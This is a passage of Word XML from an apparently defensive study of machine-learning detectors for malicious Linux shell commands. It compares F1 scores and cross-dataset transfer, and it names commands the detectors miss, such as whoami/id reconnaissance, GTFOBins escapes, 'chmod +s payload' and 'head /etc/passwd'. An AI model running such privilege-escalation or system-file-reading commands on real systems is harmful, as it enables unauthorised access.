              <w:t>payloads</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0/15 false negatives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Caught reliably</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — same 0-FN pattern on the overt-attack sources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Benign-looking LotL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (recon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, GTFOBins-style escapes, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod +s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missed.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> These </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>are</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> "normal" sequences, so an anomaly model assigns them low error and passes them through — the model's structural blind spot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — FN concentrate in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (18%), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>atomic_red_team</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (14%), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>gtfobins</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (8%); worst FNs are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apt-get changelog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod +s payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, `last \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tail`.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — the same class (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11%, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>gtfobins</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10%); worst FNs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pkaction --verbose</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>aptitude changelog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Rare-but-benign / unusual legitimate syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>False alarm.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> Novelty ≠ maliciousness: an anomaly detector fires on any unusual-but-legitimate one-liner, its dominant false-positive mode.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>False alarm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> on dual-use admin — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>linlm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 17% FP (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo iptables …</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash6k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 13% (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chsh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>head /etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10% (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>find … -exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>False alarm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> on the same but far more often (173 FP vs 100), tilted toward templated </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>find</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> pipelines (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 16%, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>linlm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 25%).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Distribution shift / novel corpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fails without augmentation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — QuasarNix's headline finding: non-augmented models do not generalize.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fails</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — transfer collapse (below).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fails, but least badly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — best cross-dataset transfer of any model.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Adversarial evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Explicitly studied</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — QuasarNix builds black-box evasion attacks and adversarially robust defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Untested</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (a gap in our work).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Untested</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (a gap in our work).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Total in-domain errors (D1, full-train)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>94 FN / 95 FP (F1 0.876)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>91 FN / 127 FP (F1 0.860)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The striking result is that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>two failure classes that matter are model-independent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: whether the detector is a supervised tree, a character CNN, or a seq2seq anomaly model, it misses benign-looking LotL and false-alarms on unusual-but-benign administration. That is not a modeling deficiency — it is the label boundary. Our XGBoost-hybrid and CNN differ only in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> they spend the error budget (the hybrid is more precise, FPR 0.044; the CNN more sensitive, recall 0.908), not in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands they get wrong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What Trizna's generalization results predict, and whether ours confirm it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The prediction.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> QuasarNix's central, empirically demonstrated claim is that a model trained on one distribution of Linux commands </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>does not generalize to another</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unless its training data is deliberately augmented to span the space — non-augmented baselines collapse, and evasion variants sail past them. A seq2seq anomaly detector inherits the same fragility from the opposite direction: it learns the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of its "normal" corpus, so a different-but-still-benign register reads as anomalous. Both framings therefore predict the same thing for our setup: because Dataset 1 (curated) and Dataset 2 (operational honeypot) are stylistically disjoint registers, a model fit on one should </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>collapse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when evaluated on the other, and the collapse should manifest as exploding false positives on the unseen benign style.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Our numbers confirm it — decisively.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Every non-augmented model roughly halves its F1 under cross-dataset transfer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/summary.json</w:t>
      </w:r>
      <w:r>
        <w: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Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>In-domain (D1 / D2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1→D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2→D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8761 / 0.8482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.534</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2756</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cnn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8603 / 0.8384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
